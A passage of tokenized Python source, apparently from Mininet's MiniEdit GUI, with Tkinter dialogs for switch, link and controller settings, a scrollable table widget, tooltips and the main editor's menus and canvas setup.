set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . ipEntry = Entry ( self . leftfieldFrame ) <EOL> self . ipEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . ipEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . dpctlEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpctlEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpctlEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . rightfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . b = Button ( self . rightfieldFrame , text = '<STR_LIT>' , command = self . addInterface ) <EOL> self . b . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . interfaceFrame = VerticalScrolledTable ( self . rightfieldFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:1> , title = '<STR_LIT>' ) <EOL> self . interfaceFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . tableFrame = self . interfaceFrame . interior <EOL> for externalInterface in externalInterfaces : <EOL> self . tableFrame . addRow ( value = [ externalInterface ] ) <EOL> self . commandFrame = Frame ( self . rootFrame ) <EOL> self . commandFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . commandFrame . 
columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> Label ( self . commandFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = W ) <EOL> self . startEntry = Entry ( self . commandFrame ) <EOL> self . startEntry . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . startEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> Label ( self . commandFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = W ) <EOL> self . stopEntry = Entry ( self . commandFrame ) <EOL> self . stopEntry . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . stopEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> def addInterface ( self ) : <EOL> self . tableFrame . addRow ( ) <EOL> def defaultDpid ( self , name ) : <EOL> "<STR_LIT>" <EOL> assert self <EOL> try : <EOL> dpid = int ( re . findall ( r'<STR_LIT>' , name ) [ <NUM_LIT:0> ] ) <EOL> dpid = hex ( dpid ) [ <NUM_LIT:2> : ] <EOL> return dpid <EOL> except IndexError : <EOL> return None <EOL> def apply ( self ) : <EOL> externalInterfaces = [ ] <EOL> for row in range ( self . tableFrame . rows ) : <EOL> if len ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> : <EOL> externalInterfaces . append ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> dpid = self . dpidEntry . get ( ) <EOL> if ( self . defaultDpid ( self . hostnameEntry . get ( ) ) is None <EOL> and len ( dpid ) == <NUM_LIT:0> ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> results = { '<STR_LIT>' : externalInterfaces , <EOL> '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : dpid , <EOL> '<STR_LIT>' : self . startEntry . get ( ) , <EOL> '<STR_LIT>' : self . stopEntry . 
get ( ) , <EOL> '<STR_LIT>' : str ( self . sflow . get ( ) ) , <EOL> '<STR_LIT>' : str ( self . nflow . get ( ) ) , <EOL> '<STR_LIT>' : self . dpctlEntry . get ( ) , <EOL> '<STR_LIT>' : self . ipEntry . get ( ) } <EOL> sw = self . switchType . get ( ) <EOL> if sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if StrictVersion ( MININET_VERSION ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + VERSION + '<STR_LIT:.>' ) <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> elif sw == '<STR_LIT>' : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> results [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . result = results <EOL> class VerticalScrolledTable ( LabelFrame ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , rows = <NUM_LIT:2> , columns = <NUM_LIT:2> , title = None , * args , ** kw ) : <EOL> LabelFrame . __init__ ( self , parent , text = title , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , * args , ** kw ) <EOL> vscrollbar = Scrollbar ( self , orient = VERTICAL ) <EOL> vscrollbar . pack ( fill = Y , side = RIGHT , expand = FALSE ) <EOL> canvas = Canvas ( self , bd = <NUM_LIT:0> , highlightthickness = <NUM_LIT:0> , <EOL> yscrollcommand = vscrollbar . set ) <EOL> canvas . pack ( side = LEFT , fill = BOTH , expand = TRUE ) <EOL> vscrollbar . config ( command = canvas . yview ) <EOL> canvas . xview_moveto ( <NUM_LIT:0> ) <EOL> canvas . yview_moveto ( <NUM_LIT:0> ) <EOL> self . interior = interior = TableFrame ( canvas , rows = rows , columns = columns ) <EOL> interior_id = canvas . create_window ( <NUM_LIT:0> , <NUM_LIT:0> , window = interior , <EOL> anchor = NW ) <EOL> def _configure_interior ( _event ) : <EOL> size = ( interior . winfo_reqwidth ( ) , interior . winfo_reqheight ( ) ) <EOL> canvas . 
config ( scrollregion = "<STR_LIT>" % size ) <EOL> if interior . winfo_reqwidth ( ) != canvas . winfo_width ( ) : <EOL> canvas . config ( width = interior . winfo_reqwidth ( ) ) <EOL> interior . bind ( '<STR_LIT>' , _configure_interior ) <EOL> def _configure_canvas ( _event ) : <EOL> if interior . winfo_reqwidth ( ) != canvas . winfo_width ( ) : <EOL> canvas . itemconfigure ( interior_id , width = canvas . winfo_width ( ) ) <EOL> canvas . bind ( '<STR_LIT>' , _configure_canvas ) <EOL> return <EOL> class TableFrame ( Frame ) : <EOL> def __init__ ( self , parent , rows = <NUM_LIT:2> , columns = <NUM_LIT:2> ) : <EOL> Frame . __init__ ( self , parent , background = "<STR_LIT>" ) <EOL> self . _widgets = [ ] <EOL> self . rows = rows <EOL> self . columns = columns <EOL> for row in range ( rows ) : <EOL> current_row = [ ] <EOL> for column in range ( columns ) : <EOL> label = Entry ( self , borderwidth = <NUM_LIT:0> ) <EOL> label . grid ( row = row , column = column , sticky = "<STR_LIT>" , padx = <NUM_LIT:1> , pady = <NUM_LIT:1> ) <EOL> current_row . append ( label ) <EOL> self . _widgets . append ( current_row ) <EOL> def set ( self , row , column , value ) : <EOL> widget = self . _widgets [ row ] [ column ] <EOL> widget . insert ( <NUM_LIT:0> , value ) <EOL> def get ( self , row , column ) : <EOL> widget = self . _widgets [ row ] [ column ] <EOL> return widget . get ( ) <EOL> def addRow ( self , value = None , readonly = False ) : <EOL> current_row = [ ] <EOL> for column in range ( self . columns ) : <EOL> label = Entry ( self , borderwidth = <NUM_LIT:0> ) <EOL> label . grid ( row = self . rows , column = column , sticky = "<STR_LIT>" , padx = <NUM_LIT:1> , pady = <NUM_LIT:1> ) <EOL> if value is not None : <EOL> label . insert ( <NUM_LIT:0> , value [ column ] ) <EOL> if readonly == True : <EOL> label . configure ( state = '<STR_LIT>' ) <EOL> current_row . append ( label ) <EOL> self . _widgets . append ( current_row ) <EOL> self . update_idletasks ( ) <EOL> self . 
rows += <NUM_LIT:1> <EOL> class LinkDialog ( tkSimpleDialog . Dialog ) : <EOL> def __init__ ( self , parent , title , linkDefaults ) : <EOL> self . linkValues = linkDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> self . var = StringVar ( master ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . e1 = Entry ( master ) <EOL> self . e1 . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = W ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e1 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . e2 = Entry ( master ) <EOL> self . e2 . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e2 . insert ( <NUM_LIT:0> , self . linkValues [ '<STR_LIT>' ] ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . e3 = Entry ( master ) <EOL> self . e3 . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> Label ( master , text = "<STR_LIT:%>" ) . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:2> , sticky = W ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e3 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . e4 = Entry ( master ) <EOL> self . e4 . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e4 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:4> , sticky = E ) <EOL> self . e5 = Entry ( master ) <EOL> self . e5 . 
grid ( row = <NUM_LIT:4> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e5 . insert ( <NUM_LIT:0> , self . linkValues [ '<STR_LIT>' ] ) <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . e6 = Entry ( master ) <EOL> self . e6 . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . linkValues : <EOL> self . e6 . insert ( <NUM_LIT:0> , str ( self . linkValues [ '<STR_LIT>' ] ) ) <EOL> return self . e1 <EOL> def apply ( self ) : <EOL> self . result = { } <EOL> if len ( self . e1 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e1 . get ( ) ) <EOL> if len ( self . e2 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = self . e2 . get ( ) <EOL> if len ( self . e3 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e3 . get ( ) ) <EOL> if len ( self . e4 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e4 . get ( ) ) <EOL> if len ( self . e5 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = self . e5 . get ( ) <EOL> if len ( self . e6 . get ( ) ) > <NUM_LIT:0> : <EOL> self . result [ '<STR_LIT>' ] = int ( self . e6 . get ( ) ) <EOL> class ControllerDialog ( tkSimpleDialog . Dialog ) : <EOL> def __init__ ( self , parent , title , ctrlrDefaults = None ) : <EOL> if ctrlrDefaults : <EOL> self . ctrlrValues = ctrlrDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> self . var = StringVar ( master ) <EOL> self . protcolvar = StringVar ( master ) <EOL> rowCount = <NUM_LIT:0> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . hostnameEntry = Entry ( master ) <EOL> self . hostnameEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . 
ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . e2 = Entry ( master ) <EOL> self . e2 . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . e2 . insert ( <NUM_LIT:0> , self . ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> controllerType = self . ctrlrValues [ '<STR_LIT>' ] <EOL> self . o1 = OptionMenu ( master , self . var , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . o1 . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . var . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( master , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> if '<STR_LIT>' in self . ctrlrValues : <EOL> controllerProtocol = self . ctrlrValues [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> self . protcol = OptionMenu ( master , self . protcolvar , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . protcol . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if controllerProtocol == '<STR_LIT>' : <EOL> self . protcolvar . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . protcolvar . set ( "<STR_LIT>" ) <EOL> rowCount += <NUM_LIT:1> <EOL> remoteFrame = LabelFrame ( master , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> remoteFrame . grid ( row = rowCount , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = W ) <EOL> Label ( remoteFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . e1 = Entry ( remoteFrame ) <EOL> self . e1 . 
grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . e1 . insert ( <NUM_LIT:0> , self . ctrlrValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> return self . hostnameEntry <EOL> def apply ( self ) : <EOL> self . result = { '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : self . e1 . get ( ) , <EOL> '<STR_LIT>' : int ( self . e2 . get ( ) ) } <EOL> controllerType = self . var . get ( ) <EOL> if controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif controllerType == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> controllerProtocol = self . protcolvar . get ( ) <EOL> if controllerProtocol == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> class ToolTip ( object ) : <EOL> def __init__ ( self , widget ) : <EOL> self . widget = widget <EOL> self . tipwindow = None <EOL> self . id = None <EOL> self . x = self . y = <NUM_LIT:0> <EOL> def showtip ( self , text ) : <EOL> "<STR_LIT>" <EOL> self . text = text <EOL> if self . tipwindow or not self . text : <EOL> return <EOL> x , y , _cx , cy = self . widget . bbox ( "<STR_LIT>" ) <EOL> x = x + self . widget . winfo_rootx ( ) + <NUM_LIT> <EOL> y = y + cy + self . widget . winfo_rooty ( ) + <NUM_LIT> <EOL> self . tipwindow = tw = Toplevel ( self . widget ) <EOL> tw . wm_overrideredirect ( <NUM_LIT:1> ) <EOL> tw . wm_geometry ( "<STR_LIT>" % ( x , y ) ) <EOL> try : <EOL> tw . tk . call ( "<STR_LIT>" , <EOL> "<STR_LIT>" , tw . _w , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> except TclError : <EOL> pass <EOL> label = Label ( tw , text = self . 
text , justify = LEFT , <EOL> background = "<STR_LIT>" , relief = SOLID , borderwidth = <NUM_LIT:1> , <EOL> font = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> label . pack ( ipadx = <NUM_LIT:1> ) <EOL> def hidetip ( self ) : <EOL> tw = self . tipwindow <EOL> self . tipwindow = None <EOL> if tw : <EOL> tw . destroy ( ) <EOL> class MiniEdit ( Frame ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , parent = None , cheight = <NUM_LIT> , cwidth = <NUM_LIT:1000> ) : <EOL> self . defaultIpBase = '<STR_LIT>' <EOL> self . nflowDefaults = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' } <EOL> self . sflowDefaults = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . appPrefs = { <EOL> "<STR_LIT>" : self . defaultIpBase , <EOL> "<STR_LIT>" : "<STR_LIT:0>" , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . sflowDefaults , <EOL> '<STR_LIT>' : self . nflowDefaults , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' } <EOL> } <EOL> Frame . __init__ ( self , parent ) <EOL> self . action = None <EOL> self . appName = '<STR_LIT>' <EOL> self . fixedFont = tkFont . Font ( family = "<STR_LIT>" , size = "<STR_LIT>" ) <EOL> self . font = ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> self . smallFont = ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> self . bg = '<STR_LIT>' <EOL> self . top = self . winfo_toplevel ( ) <EOL> self . top . title ( self . appName ) <EOL> self . createMenubar ( ) <EOL> self . cheight , self . cwidth = cheight , cwidth <EOL> self . cframe , self . canvas = self . createCanvas ( ) <EOL> self . controllers = { } <EOL> self . images = miniEditImages ( ) <EOL> self . buttons = { } <EOL> self . active = None <EOL> self . 
tools = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . customColors = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . toolbar = self . createToolbar ( ) <EOL> self . toolbar . grid ( column = <NUM_LIT:0> , row = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . cframe . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:0> ) <EOL> self . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> self . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . pack ( expand = True , fill = '<STR_LIT>' ) <EOL> self . aboutBox = None <EOL> self . nodeBindings = self . createNodeBindings ( ) <EOL> self . nodePrefixes = { '<STR_LIT>' : '<STR_LIT:r>' , '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT:h>' , '<STR_LIT>' : '<STR_LIT:c>' } <EOL> self . widgetToItem = { } <EOL> self . itemToWidget = { } <EOL> self . link = self . linkWidget = None <EOL> self . selection = None <EOL> self . bind ( '<STR_LIT>' , lambda event : self . quit ( ) ) <EOL> self . bind ( '<STR_LIT>' , self . deleteSelection ) <EOL> self . bind ( '<STR_LIT>' , self . deleteSelection ) <EOL> self . focus ( ) <EOL> self . hostPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . hostPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . hostPopup . add_separator ( ) <EOL> self . hostPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . hostDetails ) <EOL> self . hostRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . hostRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . hostRunPopup . add_separator ( ) <EOL> self . hostRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . xterm ) <EOL> self . legacyRouterRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . legacyRouterRunPopup . add_command ( label = '<STR_LIT>' , font = self . 
font ) <EOL> self . legacyRouterRunPopup . add_separator ( ) <EOL> self . legacyRouterRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . xterm ) <EOL> self . switchPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . switchPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . switchPopup . add_separator ( ) <EOL> self . switchPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . switchDetails ) <EOL> self . switchRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . switchRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . switchRunPopup . add_separator ( ) <EOL> self . switchRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . listBridge ) <EOL> self . linkPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . linkPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . linkPopup . add_separator ( ) <EOL> self . linkPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkDetails ) <EOL> self . linkRunPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . linkRunPopup . add_separator ( ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkUp ) <EOL> self . linkRunPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . linkDown ) <EOL> self . controllerPopup = Menu ( self . top , tearoff = <NUM_LIT:0> ) <EOL> self . controllerPopup . add_command ( label = '<STR_LIT>' , font = self . font ) <EOL> self . controllerPopup . add_separator ( ) <EOL> self . controllerPopup . add_command ( label = '<STR_LIT>' , font = self . font , command = self . controllerDetails ) <EOL> self . linkx = self . linky = self . linkItem = None <EOL> self . lastSelection = None <EOL> self . 
links = { } <EOL> self . hostOpts = { } <EOL> self . switchOpts = { } <EOL> self . hostCount = <NUM_LIT:0> <EOL> self . switchCount = <NUM_LIT:0> <EOL> self . controllerCount = <NUM_LIT:0> <EOL> self . net = None <EOL> Wm . wm_protocol ( self . top , name = '<STR_LIT>' , func = self . quit ) <EOL> def quit ( self ) : <EOL> "<STR_LIT>" <EOL> self . stop ( ) <EOL> Frame . quit ( self ) <EOL> def createMenubar ( self ) : <EOL> "<STR_LIT>" <EOL> font = self . font <EOL> mbar = Menu ( self . top , font = font ) <EOL> self . top . configure ( menu = mbar ) <EOL> fileMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = fileMenu ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . newTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . loadTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . saveTopology ) <EOL> fileMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . exportScript ) <EOL> fileMenu . add_separator ( ) <EOL> fileMenu . add_command ( label = '<STR_LIT>' , command = self . quit , font = font ) <EOL> editMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = editMenu ) <EOL> editMenu . add_command ( label = "<STR_LIT>" , font = font , <EOL> command = lambda : self . deleteSelection ( None ) ) <EOL> editMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . prefDetails ) <EOL> runMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = runMenu ) <EOL> runMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . doRun ) <EOL> runMenu . add_command ( label = "<STR_LIT>" , font = font , command = self . doStop ) <EOL> fileMenu . add_separator ( ) <EOL> runMenu . add_command ( label = '<STR_LIT>' , font = font , command = self . 
ovsShow ) <EOL> runMenu . add_command ( label = '<STR_LIT>' , font = font , command = self . rootTerminal ) <EOL> appMenu = Menu ( mbar , tearoff = False ) <EOL> mbar . add_cascade ( label = "<STR_LIT>" , font = font , menu = appMenu ) <EOL> appMenu . add_command ( label = '<STR_LIT>' , command = self . about , <EOL> font = font ) <EOL> def createCanvas ( self ) : <EOL> "<STR_LIT>" <EOL> f = Frame ( self ) <EOL> canvas = Canvas ( f , width = self . cwidth , height = self . cheight , <EOL> bg = self . bg ) <EOL> xbar = Scrollbar ( f , orient = '<STR_LIT>' , command = canvas . xview ) <EOL> ybar = Scrollbar ( f , orient = '<STR_LIT>' , command = canvas . yview ) <EOL> canvas . configure ( xscrollcommand = xbar . set , yscrollcommand = ybar . set ) <EOL> resize = Label ( f , bg = '<STR_LIT>' ) <EOL> canvas . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> ybar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> xbar . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> resize . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> f . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> f . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> f . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> f . bind ( '<STR_LIT>' , lambda event : self . updateScrollRegion ( ) ) <EOL> canvas . bind ( '<STR_LIT>' , self . clickCanvas ) <EOL> canvas . bind ( '<STR_LIT>' , self . dragCanvas ) <EOL> canvas . bind ( '<STR_LIT>' , self . releaseCanvas ) <EOL> return f , canvas <EOL> def updateScrollRegion ( self ) : <EOL> "<STR_LIT>" <EOL> bbox = self . canvas . bbox ( '<STR_LIT:all>' ) <EOL> if bbox is not None : <EOL> self . canvas . configure ( scrollregion = ( <NUM_LIT:0> , <NUM_LIT:0> , bbox [ <NUM_LIT:2> ] , <EOL> bbox [ <NUM_LIT:3> ] ) ) <EOL> def canvasx ( self , x_root ) : <EOL> "<STR_LIT>" <EOL> c = self . 
canvas <EOL> return c . canvasx ( x_root ) - c . winfo_rootx ( ) <EOL> def canvasy ( self , y_root ) : <EOL> "<STR_LIT>" <EOL> c = self . canvas <EOL> return c . canvasy ( y_root ) - c . winfo_rooty ( ) <EOL> def activate ( self , toolName ) : <EOL> "<STR_LIT>" <EOL> if self . active : <EOL> self . buttons [ self . active ] . configure ( relief = '<STR_LIT>' ) <EOL> self . buttons [ toolName ] . configure ( relief = '<STR_LIT>' ) <EOL> self . active = toolName <EOL> @ staticmethod <EOL> def createToolTip ( widget , text ) : <EOL> toolTip = ToolTip ( widget ) <EOL> def enter ( _event ) : <EOL> toolTip . showtip ( text ) <EOL> def leave ( _event ) : <EOL> toolTip . hidetip ( ) <EOL> widget . bind ( '<STR_LIT>' , enter ) <EOL> widget . bind ( '<STR_LIT>' , leave ) <EOL> def createToolbar ( self ) : <EOL> "<STR_LIT>" <EOL> toolbar = Frame ( self ) <EOL> for tool in self . tools : <EOL> cmd = ( lambda t = tool : self . activate ( t ) ) <EOL> b = Button ( toolbar , text = tool , font = self . smallFont , command = cmd ) <EOL> if tool in self . images : <EOL> b . config ( height = <NUM_LIT> , image = self . images [ tool ] ) <EOL> self . createToolTip ( b , str ( tool ) ) <EOL> b . pack ( fill = '<STR_LIT:x>' ) <EOL> self . buttons [ tool ] = b <EOL> self . activate ( self . 